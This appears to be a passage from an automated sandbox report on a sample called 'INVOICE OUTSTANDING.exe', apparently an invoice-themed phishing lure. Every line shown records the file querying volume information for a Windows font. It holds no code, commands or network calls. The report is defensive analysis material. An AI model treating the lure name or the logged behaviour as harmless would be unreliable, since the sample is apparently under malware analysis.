            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
